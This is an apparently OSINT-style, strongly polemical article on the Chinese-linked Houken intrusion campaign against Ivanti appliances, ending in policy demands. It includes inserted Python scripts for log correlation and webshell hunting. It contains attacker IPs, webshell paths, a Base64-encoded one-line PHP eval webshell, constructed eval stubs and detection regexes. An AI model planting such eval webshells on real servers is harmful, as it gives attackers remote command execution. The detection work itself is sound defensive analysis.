
CHINESE DIGITAL AGGRESSION IS NO LONGER TOLERABLE: HOUKEN ROOTKITS UNVEIL BEIJING'S LIMINAL WARFARE STRATEGY

Key Takeaways

  • Aggressive State-Sponsored Cyber Operations: The Chinese state is actively engaged in a persistent and incremental "Liminal Warfare" against Western nations, using sophisticated cyber espionage as a primary weapon to erode sovereignty, economic capacity, and national security below the threshold of conventional conflict.

  • Houken: An Elite Spearhead: Houken is identified as an elite threat group operating since September 2024, utilizing previously unknown zero-day vulnerabilities in critical internet-exposed appliances like Ivanti Cloud Service Appliances (CSA) to gain initial access to vital sectors including government, telecommunications, media, finance, and transport.

  • Advanced Persistence Mechanisms: Houken employs highly sophisticated tools like kernel-level Linux rootkits (sysinitd.ko and sysinitd), which hijack TCP traffic and grant root privileges, making detection and remediation extremely difficult and ensuring prolonged, covert access. They also deploy custom PHP webshells and modify legitimate scripts for persistence.

  • Direct Link to Chinese State Apparatus: Houken is definitively linked to UNC5174, a group widely considered an access broker for China's Ministry of State Security (MSS). Shared tactics, techniques, and procedures (TTPs) include specific account creation ("Root6"), self-patching of exploited vulnerabilities, and the use of common open-source tools predominantly developed by Chinese programmers.

  • Broader Chinese Cyber Ecosystem: China's cyber capabilities are a product of deep integration between the PLA, MSS, universities (e.g., Shanghai Jiao Tong, Zhejiang, Harbin Institute of Technology), and private cybersecurity firms (e.g., Beijing TopSec), which serve as incubators for talent and development centers for offensive tools.

  • Massive Economic Espionage and Sabotage Potential: The primary motivation extends beyond intelligence gathering to include economic espionage, resulting in billions of dollars in IP theft annually from Western industries. Groups like Volt Typhoon (linked to the PLA) have pre-positioned implants in critical infrastructures (e.g., U.S. power grids, ports, water facilities), indicating preparation for potential sabotage during crises.

  • Tactics for Attribution Obfuscation: Chinese threat actors actively use methods to obscure their origins, including commercial VPNs, residential/mobile IPs, and publicly available malware, making it extremely difficult to trace attacks back to Beijing and enabling plausible deniability.

  • Intolerable Aggression and Call for Action: This persistent and incremental aggression is no longer tolerable. A fragmented response is perceived as weakness. An immediate, unified, and decisive global response is required, including aggressive intelligence sharing, robust defensive measures, firm attribution, and strategic international collaboration.

  • Urgent Need to Ban Strategic Chinese Technologies: The inherent risks posed by the integration of Chinese technology companies with the state's intelligence and military apparatus necessitate urgent evaluation and potential prohibition of Chinese hardware, software, and services in critical and strategic sectors. These technologies may act as inherent "backdoors" or "Trojan horses" facilitating cyberattacks and compromising national security.


Credit Extrema Ratio

The world is at war. Not a conventional war, with tanks and missiles, but a subtle, persistent, and incremental war: the "Liminal Warfare" waged by the Chinese State. This doctrine, or "unrestricted warfare," theorizes and implements conflict that operates below the threshold of conventional armed conflict, leveraging every available means—economic, political, social, and, crucially, cyber—to erode the sovereignty, economic capacity, and national security of adversaries without ever declaring war. At the heart of this digital storm stands Houken, an elite threat group whose ferocity and sophistication raise chilling questions about our ability to defend against state-sponsored espionage that knows no bounds. The French National Agency for the Security of Information Systems (ANSSI) has peeled back the curtain on these operations, revealing how infiltration into critical infrastructures and the massive exfiltration of data are inescapable pillars of Beijing's hybrid warfare, not merely for intelligence gathering, but as preparation for future sabotage operations or direct influence. This aggression is no longer tolerable and demands an immediate and decisive response.

The state-sponsored cyber espionage by the Chinese State is not a recent phenomenon but the culmination of meticulous strategic preparation. Following the military and intelligence restructuring initiated by Xi Jinping in 2016, the techniques employed by China-affiliated espionage groups have continuously evolved, becoming more covert and agile. The objective: to make attribution and identification of operations extremely difficult.

Beijing has developed a sophisticated arsenal of tactics and techniques. Intellectual property (IP) theft is conducted on a planetary scale, with cyber intrusions allowing Chinese companies to access proprietary information, project funding data, and technological secrets. This is not merely the theft of science and technology, but a method of intelligence gathering for potential attacks against military, governmental, and commercial systems in target countries.

The People's Liberation Army (PLA) and the Ministry of State Security (MSS) coordinate these operations. Groups like Volt Typhoon, linked to the PLA, have infiltrated American critical infrastructures for years—from ports to factories, water treatment plants to power grids, including strategic territories like Guam—with the objective of "sabotage in times of crisis or war." Concurrently, the MSS operates with a much broader geographical reach, targeting the United States, Europe, and Latin America.

The Chinese strategy is characterized by:

  • Exploitation of zero-day and N-day vulnerabilities: Beijing has effectively exploited more zero-days and N-days in 2020/2021 than any other state.

  • Supply chain compromise: Supply chain compromise incidents conducted by Chinese actors from 2013 to 2020 are almost double those of Russia and North Korea combined. Noteworthy examples include the APT41 campaign against the ASUS update utility, dubbed "Operation ShadowHammer," which affected over 50,000 systems.

  • Diverse initial access vectors: Email phishing, social engineering, strategic web compromise, and SQL injection are just some of the techniques used to gain initial access.

  • Attribution obfuscation: Chinese groups use publicly available malware to blend in with other threat activities, and they employ a vast network of private companies and contractors to conceal government involvement. The indictment of 10 Chinese nationals who worked on behalf of i-Soon, together with two officials from the Chinese Ministry of Public Security (MPS), is clear evidence of this.

  • "Dual-use" operations: Espionage and criminal activities (like ransomware, especially in the video game sector) are deliberately mixed to confuse attribution.

The cost of this aggression is devastating. Intellectual property theft alone costs the U.S. economy up to $600 billion annually, a figure that exceeds the total profits of the top 50 companies in the Fortune 500. Cyber intrusions pose a fundamental threat to the economic competitiveness and national security of affected states. Dutch military intelligence (MIVD) has stated that Chinese espionage is more widespread than initially thought, with a state-backed group causing at least 20,000 victims in just a few months in 2023.


The attack campaign: The dawn of a new era of threats

Since September 2024, Houken has launched a targeted offensive, exploiting zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) devices—critical, internet-exposed network appliances serving as pivotal access points. These flaws, unknown and unpatched at the time of the attacks, provided Houken an invisible entry, demonstrating their superior capability in discovering and exploiting top-tier vulnerabilities—a clear signal of limitless resources and malicious intent.

Once a foothold was established on Ivanti CSA devices, Houken's objectives became grimly clear: to acquire credentials through the execution of a base64-encoded Python script, establish insidious persistence via PHP webshells (often created or injected into legitimate scripts), and, in a terrifying escalation, install kernel modules acting as rootkits. In a further calculated challenge to defenders, Houken even attempted to self-patch the exploited vulnerabilities post-compromise, making it harder for other actors or victims themselves to detect and close the breaches. The latest activities linked to this campaign were observed by ANSSI at the end of November 2024.


Global reach: The world in the crosshairs of Chinese espionage

Houken's impact is not confined to France. ANSSI has confirmed incidents affecting French governmental, telecommunications, media, finance, and transport sectors, but its reach extends to Southeast Asia (including Thailand, Vietnam, and Indonesia), Europe, and the United States. This strategic targeting perfectly aligns with the hypothesis that Houken acts as an "access broker" on behalf of a state entity, likely interested in sensitive information. The attackers' operational time zone, UTC+8 (CST), unequivocally points to Beijing. This economic and political espionage, masked as criminal activity, is a hallmark of "Liminal Warfare," where the lines between peace and conflict are deliberately blurred.


Houken and UNC5174: A criminal link to the Chinese state apparatus

ANSSI's investigations have traced a direct and irrefutable link between Houken and UNC5174, a threat group previously identified by Google Threat Intelligence Group (GTIG) as a potential access broker for the Chinese Ministry of State Security (MSS). The operational similarities between the two groups are too striking to be coincidental; they are evidence of a single criminal mind operating on behalf of the Chinese state:

  • "Root6" account creation: A distinctive practice observed in both Houken and UNC5174.

  • Systematic self-patching: Both groups show a preference for self-patching exploited vulnerabilities, a tactic that hinders detection and mitigation by victims.

  • Shared open-source tools: Houken's arsenal includes open-source tools like GOREVERSE, VShell, fscan, and ffuff, all known to have been used by UNC5174 and predominantly developed by Chinese-speaking programmers, suggesting a common ecosystem for developing and procuring malicious tools. Known tools include Nmap, Fscan, Netspy, Nacs for network discovery; Ettercap, Responder for network attack; Iox, FRP, NPS (NPC), EarthWorm, GoHTran, ReverseSocks5, Suo5 for proxy and tunneling; Searchall for credential gathering; and GOREVERSE (reverse_ssh), ReverseSSH, SparkRAT for backdoors and persistence.

  • Specific filenames: The use of the filename "OutlookEN.aspx" for suo5 webshells by Houken mirrors a documented practice of UNC5174.

These operational overlaps paint a terrifying picture: Houken and UNC5174 are likely managed by a single threat actor whose mission transcends mere financial gain. ANSSI has indeed observed an escalation in Houken's post-exploitation activities, with a clear interest in intelligence gathering. The discovery in March 2025, where Houken exfiltrated a massive amount of emails from a South American Ministry of Foreign Affairs server, reinforces the thesis that intelligence collection is a primary motivation. This is not just economic espionage but an activity directly aimed at bolstering China's geostrategic position.


A disturbing paradox: Sophistication and calculated negligence

Houken's operators present a paradox that is both ingenious and disturbing: the ability to exploit zero-days and deploy highly complex rootkits alongside the use of a wide range of open-source tools, often developed by Chinese-speaking programmers. This ambivalence suggests a "multi-actor" model, where one group might be tasked with advanced vulnerability research, while another handles industrialized exploitation.

Their attack infrastructure is a complex mosaic: combining commercial VPN services (like NordVPN, ExpressVPN, Proton VPN, Deeper Network VPN, Surfshark VPN, and IVPN), Tor nodes, dedicated servers (VPS from HOSTHATCH, ColoCrossing, JVPS.hosting), and even residential or mobile IP addresses (such as China Unicom, China Telecom, MTS, Airtel). This heterogeneity, far from being an operational error, serves to camouflage the origins of operations and complicate attribution processes. The reuse of IP addresses like 23.236.66.97, 134.195.90.71, 64.176.49.160, and 156.234.193.18 across different victims highlights either a disregard for operational security or, more likely, a calculated trade-off given the nature of "Liminal Warfare" where speed and opportunity outweigh absolute stealth. This difficulty in attribution is a strategic objective for Beijing, allowing China to deny responsibility and operate in a "gray zone" of conflict.
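The text's attribution point rests on the same source addresses recurring across different victims. The following script, added here as an illustration and not taken from ANSSI or the article, shows how an analyst correlates per-victim web-server logs to surface that overlap. The log lines are constructed in a common-log-style format prefixed with a victim label; the four public IPs are the ones named above, and 198.51.100.7 (TEST-NET-2) stands in for ordinary traffic.

```python
"""Cross-victim infrastructure overlap: which source IPs recur across victims.

Added example (not from the ANSSI report or the article). Log lines are
constructed; the victim labels and the benign IP 198.51.100.7 are made up.
"""
import re
from collections import defaultdict

# victim-label  client-ip  ident  user  [timestamp]  "METHOD path PROTO"  status
LOG_RE = re.compile(
    r'^(?P<victim>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample logs from three hypothetical victims.
SAMPLE_LOGS = [
    'victim-a 23.236.66.97 - - [12/Oct/2024:03:14:07 +0000] "GET /rc/help.php HTTP/1.1" 200',
    'victim-a 64.176.49.160 - - [12/Oct/2024:03:20:41 +0000] "POST /client/rcc.php HTTP/1.1" 200',
    'victim-a 198.51.100.7 - - [12/Oct/2024:08:00:00 +0000] "GET /index.php HTTP/1.1" 200',
    'victim-b 23.236.66.97 - - [15/Oct/2024:02:58:33 +0000] "POST /gsb/help.php HTTP/1.1" 200',
    'victim-b 134.195.90.71 - - [15/Oct/2024:03:01:10 +0000] "GET /rc/help.php HTTP/1.1" 200',
    'victim-c 134.195.90.71 - - [21/Nov/2024:01:45:59 +0000] "GET /client/rcc.php HTTP/1.1" 200',
    'victim-c 156.234.193.18 - - [21/Nov/2024:01:47:02 +0000] "GET /rc/help.php HTTP/1.1" 404',
    'malformed line that the parser must skip',
]


def parse_logs(lines):
    """Yield parsed records; silently skip lines that do not match the format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def shared_infrastructure(lines, min_victims=2):
    """Return {ip: {"victims": [...], "paths": [...]}} for IPs seen at >= min_victims victims."""
    victims_by_ip = defaultdict(set)
    paths_by_ip = defaultdict(set)
    for rec in parse_logs(lines):
        victims_by_ip[rec["ip"]].add(rec["victim"])
        paths_by_ip[rec["ip"]].add(rec["path"])
    return {
        ip: {"victims": sorted(v), "paths": sorted(paths_by_ip[ip])}
        for ip, v in victims_by_ip.items()
        if len(v) >= min_victims
    }


if __name__ == "__main__":
    for ip, info in shared_infrastructure(SAMPLE_LOGS).items():
        print(ip, "victims:", ", ".join(info["victims"]), "paths:", ", ".join(info["paths"]))
```

The paths hit by each recurring address are kept alongside the victim list so that the overlap can be pivoted straight into the webshell filenames discussed further down; lowering `min_victims` to 1 turns the same function into a plain per-IP inventory.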


Persistence mechanisms: Rootkits that defy all defenses

Houken's toolkit includes a previously unseen Linux rootkit, composed of a kernel module (sysinitd.ko) and a user-space executable (sysinitd). This rootkit is not a simple persistence tool; it is an advanced mechanism that hijacks inbound TCP traffic over all ports, allowing remote command execution with root privileges and bypassing traditional network monitoring measures. Its ability to ensure deep persistence makes detection and remediation a titanic task, enabling Beijing to maintain prolonged and covert access to compromised networks. This kernel-level malware is a stark example of the "dual-use" nature of Chinese offensive tools: while primarily for espionage, its versatility could extend to sabotage or massive compromise, complicating the identification of primary motivations. ANSSI has provided specific YARA rules for detecting this rootkit.

Other persistence mechanisms include the creation of PHP webshells with common names like /rc/help.php, /client/rcc.php, /gsb/help.php, often with custom PHP request variables such as $_REQUEST['a'] or $_REQUEST['jhc']. Some of these webshells are linked to open-source tools like Neo-reGeorg or the Behinder ("Ice Scorpion") webshell framework. Modification of file time attributes to obscure activities has also been observed. Furthermore, operators appended malicious PHP code to legitimate scripts like /etc/php.ini, allowing command execution from any page via variables like justatest, decoded from Base64 strings like PD9waHAgQGV2YWwoJF9SRVFVRVNUW2p1c3RhdGVzdF0pOyA/Pg==. The use of out-of-band application security testing (OAST) tools such as Eyes.sh and Interactsh, and services like Burp Collaborator, demonstrates a methodical approach to vulnerability discovery.
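The indicators in the previous paragraph (reported webshell filenames, eval over a request variable, PHP code appended to php.ini, and a Base64-encoded stub) translate directly into a static hunt over a web root. The script below is an added example, not code from ANSSI or the article; the paths and parameter names come from the text, while every file body is a constructed sample rather than a real artefact. It also re-scans anything that decodes from Base64 so that an encoded stub is caught by the same rules as a plain one.

```python
"""Static indicators for the PHP webshell persistence described above.

Added example, not code from ANSSI or the article. Paths, parameter names and
the php.ini append technique come from the text; every file body below is a
constructed sample, not a real artefact.
"""
import base64
import re

# Webshell filenames named in the text; matched as path suffixes.
SUSPICIOUS_PATHS = ("/rc/help.php", "/client/rcc.php", "/gsb/help.php")

# eval() over a request superglobal, capturing the parameter name
# ("a", "jhc" and "justatest" in the text). Quoted or bare keys both match.
EVAL_REQUEST_RE = re.compile(
    r"@?eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?(\w+)['\"]?\s*\]\s*\)",
    re.IGNORECASE,
)
PHP_TAG_RE = re.compile(r"<\?php", re.IGNORECASE)
# Runs of the base64 alphabet long enough to hold a one-line PHP stub.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{24,}={0,2}(?![A-Za-z0-9+/=])")

# Constructed one-line stub of the kind the text describes, and its base64 form.
STUB_TEXT = "<?php @eval($_REQUEST[a]); ?>"
ENCODED_STUB = base64.b64encode(STUB_TEXT.encode()).decode()

# Constructed sample files: one clean page, one webshell, one php.ini with an
# appended stub, and one script that carries the stub base64-encoded.
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>\n",
    "/var/www/html/rc/help.php": "<?php @eval($_REQUEST['jhc']); ?>\n",
    "/etc/php.ini": "display_errors = Off\nmemory_limit = 128M\n<?php @eval($_REQUEST[justatest]); ?>\n",
    "/var/www/html/client/rcc.php": "<?php $p = base64_decode('" + ENCODED_STUB + "'); ?>\n",
}


def decode_base64_runs(text):
    """Return (blob, decoded) for each base64 run that decodes to printable text."""
    hits = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        padded = blob + "=" * (-len(blob) % 4)  # repair stripped padding
        try:
            decoded = base64.b64decode(padded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            hits.append((blob, decoded))
    return hits


def scan_file(path, content):
    """Return a list of indicator strings for one file."""
    findings = []
    if path.endswith(SUSPICIOUS_PATHS):
        findings.append(f"filename matches a reported webshell name: {path}")
    for m in EVAL_REQUEST_RE.finditer(content):
        findings.append(f"eval over request parameter '{m.group(1)}'")
    # php.ini is configuration; any PHP open tag in it is appended code.
    if path.endswith("php.ini") and PHP_TAG_RE.search(content):
        findings.append("PHP open tag inside php.ini (appended code)")
    # Decode base64 runs and apply the same checks to the payload.
    for blob, decoded in decode_base64_runs(content):
        params = [m.group(1) for m in EVAL_REQUEST_RE.finditer(decoded)]
        if PHP_TAG_RE.search(decoded) or params:
            findings.append(f"base64 run {blob[:12]}... decodes to PHP stub, params={params}")
    return findings


def hunt(files):
    """Map each path with at least one indicator to its findings."""
    results = {}
    for path, content in files.items():
        findings = scan_file(path, content)
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for path, findings in hunt(SAMPLE_FILES).items():
        print(path)
        for f in findings:
            print("  -", f)
```

The filename check is deliberately a suffix match, since the same relative webshell names can appear under any web root, and the php.ini rule flags any PHP open tag at all because a configuration file has no legitimate reason to contain one. Run against a real tree, the indicators are a triage aid to be confirmed with the YARA rules ANSSI published and with file-timestamp review, given that timestamp tampering is also reported.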


Devastating consequences: The true cost of "Liminal Warfare"

Persistent access to global critical infrastructures such as energy, transportation, or telecommunications is not merely a matter of intelligence gathering. It is a strategic capability that, in a geopolitical escalation, could lead to massive service disruptions, direct sabotage, or the manipulation of vital infrastructures, compromising national security and civil stability. Control over these systems is not just for espionage, but for the ability to "turn off" or "manipulate" entire sectors when strategically necessary.

In parallel, economic espionage inflicts devastating damage on global economies. The theft of intellectual property, trade secrets, and research and development data—as extensively demonstrated by groups like APT41, which have targeted sectors from aerospace to pharmaceuticals in over 20 countries—results in incalculable economic bleeding for Western companies and an erosion of national competitiveness and innovation. These thefts are not isolated incidents but part of a systematic transfer of wealth and technology that shifts global economic balances in Beijing's favor. The Commission on the Theft of American Intellectual Property estimated that for the U.S. alone, intellectual property theft costs the economy up to $600 billion annually, a figure exceeding the total profits of the top 50 Fortune 500 companies. Flagrant cases such as APT41's 2018 campaign against the ASUS update utility, dubbed "Operation ShadowHammer" by Kaspersky, which affected over 50,000 systems, underscore the massive scale and gravity of these operations.

China has demonstrated a disturbing capacity for sabotage, as evidenced by the Volt Typhoon group's intrusions. In 2023 it emerged that Volt Typhoon had for years infiltrated a staggering range of American critical infrastructures—from ports to factories, water treatment plants to power grids—including strategic U.S. territories like Guam. These "preparatory implants" or "digital tripwires" were inserted for political and potentially military objectives. Volt Typhoon also attacked a U.S. electric utility in Massachusetts in 2023, aiming to exfiltrate sensitive operational technology (OT) infrastructure data. The actions of the Volt Typhoon subgroup, Voltzite, against the Littleton Electric Light and Water Departments (LELWD) necessitated a joint FBI and Dragos response. This is not mere espionage, but clear preparation for electronic warfare and sabotage in times of crisis. Dutch military intelligence (MIVD) has stated that Chinese espionage is more widespread than initially thought, with a state-backed group causing at least 20,000 victims in just a few months in 2023. European parliamentarians have also been targeted by Chinese cyberattacks, with a March 2024 U.S. indictment alleging that Chinese hackers linked to the MSS targeted "every member of the European Union" in the Inter-Parliamentary Alliance on China (IPAC), sending over 1,000 emails to collect data. This attack extended to the European Parliament itself, where Chinese espionage reportedly infiltrated.


State-sponsored cyber espionage: The evolution of an intolerable threat

State-sponsored cyber espionage by the Chinese State constitutes only a part of the broader scope of cyber warfare activities. Following the military and intelligence restructuring initiated by Xi Jinping in 2016, the techniques employed by China-affiliated espionage groups have continuously evolved, becoming more covert and agile. The objective: to make attribution and identification of operations extremely difficult.

Chinese cyber groups have become more clandestine and sophisticated, adopting measures to complicate attribution and identification of their operations. The use of software supply chains and third-party compromises to gather data now makes detection and prevention of intrusions more challenging. Cyber espionage malware has also been modernized to operate across a wider variety of operating systems. Chinese groups, in an attempt to blend in with other threat activities, are increasingly likely to use publicly available malware.

What distinguishes Chinese cyber espionage from that of other states are the national interests pursued and the scale of operations. Beijing has unique intelligence collection requirements, for instance, in Hong Kong, Tibet, and the Uyghur community; and in terms of scale, Chinese activity is greater. State-linked Chinese groups conducting compromises exploit more zero-days and are numerically larger than those of other states. Chinese actors use a variety of “initial access vectors” such as email phishing and social engineering, strategic web compromise, and SQL injection. They have also effectively exploited N-day and zero-day compromises in 2020/2021 more than any other state.

In early 2020, one of the most prolific Chinese cyber espionage groups, APT41, conducted a large-scale campaign, exploiting vulnerabilities in corporate network and endpoint management devices from Citrix, Cisco, and Zoho, successfully impacting over 75 companies in more than 20 countries with activities ranging from aerospace to defense, pharmaceuticals, energy, and public utilities. From January to March 2021, at least five sets of Chinese activities exploited "ProxyLogon" vulnerabilities in Microsoft Exchange to gain access to targeted networks. Many intrusions conducted between August 2020 and March 2021 in the defense, government, high-tech, transportation, and financial sectors of the United States and Europe were attributed to two Chinese clusters, one of which is suspected to have ties to the group known as APT5. The Chinese group named APT10 reportedly also conducted third-party compromises via MSPs in North America and Europe. During an investigation in response to 2019 incidents at a telecommunications network provider, malware named MESSAGETAP was attributed to the APT41 group.

Beijing's cyber espionage activities fall under both the Ministry of State Security (MSS) and the PLA, but they differ in geographical scope, operational alignment, and victims. While threat groups affiliated with the PLA's Theater Commands, such as Tonto Team, TEMP, and Overboard, focus operations within their respective Commands' areas of responsibility, those of the MSS, like APT41, APT5, and APT10, operate over a much wider geographical scope, including the United States, Europe, Latin America, the Caribbean, and North America. Essentially, the MSS conducts internal counter-espionage operations, non-military foreign intelligence, and supports aspects of political security.

This vast espionage network extends deeply into Chinese society. Chinese universities openly collaborate with the PLA and the MSS to conduct state-sponsored cyber espionage operations. Institutions like Shanghai Jiao Tong University, Zhejiang University, Harbin Institute of Technology, Xidian University, Southeast University, and others are veritable incubators for hackers and research centers dedicated to developing offensive capabilities for the Chinese military and intelligence, receiving direct funding from the PLA and MSS. The U.S. Department of Justice has even accused Chinese nationals and officials from the Ministry of Public Security (MPS) of directing hacking operations on behalf of private companies like i-Soon, demonstrating the hybrid and covert nature of these attacks. Some Chinese cybersecurity firms, such as Beijing TopSec, work with the PLA on hacking campaigns, operator training, and the instruction of future hackers. Critical technologies, like advanced semiconductors from ASML in the Netherlands, or research at centers like Imec in Belgium, have become primary targets, pushing the European Union to increase security and assess risks.


The future of Houken: A persistent and evolving threat – A WAR NO LONGER TOLERABLE

The threat actor behind Houken and UNC5174 remains frighteningly active. It is certain that they will continue to target internet-facing equipment, such as endpoint managers or VPN appliances, through opportunistic global vulnerability exploitation. This is not a forecast, but a harsh reality imposed by Chinese strategy.

The continuous evolution of Houken's tactics, their disarmingly effective exploitation of zero-days, and their operational ambivalence represent an existential threat to global cybersecurity. Chinese "Liminal Warfare," which views state espionage as an inseparable pillar of a hybrid strategy, demands a unified and decisive international response. Passivity or a fragmented response from Western states will be perceived as weakness, encouraging further, more audacious attacks. It is imperative that our intelligence agencies and governments adopt adequate management and response to this persistent and incremental threat. We can no longer tolerate this constant aggression.

Urgent mitigation measures: IT'S TIME TO ACT

  1. Proactive deterrence and denial of benefits: Develop and implement cyber deterrence strategies that not only threaten a proportionate response but also make attacks too costly or ineffective for the aggressor. This includes the ability to respond rapidly and proportionately.

  2. Aggressive intelligence sharing: Intensify the sharing of IoCs (Indicators of Compromise), TTPs, and threat intelligence among government agencies, critical sectors, and international partners. Speed in information dissemination is crucial for preemptive defense.

  3. Strengthening defenses: Massively invest in the resilience of critical infrastructures, implementing advanced security solutions, such as behavior-based detection and artificial intelligence, to identify the most sophisticated threats like rootkits. Crucial are network segmentation to contain compromises, timely patching of N-day vulnerabilities (already known but not yet patched), and continuous and in-depth monitoring to identify anomalous activities.

  4. Supply chain security: Drastically strengthen the security of software and hardware supply chains to mitigate the risks of upstream compromises, a vector widely exploited by Chinese actors.

  5. Firm attribution and counter-intelligence: Enhance capabilities for rapid and accurate attribution of attacks. Once attribution is established, apply targeted sanctions, public condemnations, and joint diplomatic pressure to increase political and economic costs for China. Counter-intelligence capabilities are also necessary to dismantle Chinese recruitment, training, and malware development networks.

  6. International collaboration: Promote and solidify international cybersecurity alliances, developing joint defensive and offensive strategies.

  7. Ban on strategic Chinese technologies: Urgently evaluate and, where necessary, implement a ban on the use of hardware, software, and technological services originating from China in critical and strategic sectors. The proven integration between Chinese companies, universities, and the espionage apparatus makes these tools potential "backdoors" or "Trojan horses" within our networks, facilitating cyberattacks and compromising our security from the ground up. The only solution is to eradicate the risk at its root by excluding suppliers whose control chains and purposes are opaque and potentially hostile.

Transnational cooperation and timely sharing of threat intelligence are no longer options but absolute imperatives to hope to counter the increasingly audacious operations of these actors and safeguard our national security and sovereignty in this new era of conflict. The time for waiting is over. China is waging war, and the world must respond with the same determination.




About Extrema Ratio
Extrema Ratio is a leading, widely known organization specializing in Open Source Analysis and Intelligence (OSINT), with a particular focus on China's liminal global influence and the complexities of international relations. Through in-depth research, analysis, and expert commentary, Extrema Ratio provides valuable insights into national security, foreign malicious interference, and strategic challenges posed by emerging global powers.
The organization's mission is to inform the public and advise policymakers, public and private institutions, businesses and professionals on the risks and opportunities of today's rapidly changing geopolitical landscape. For more analysis and resources, visit Extrema Ratio's blog and publications.



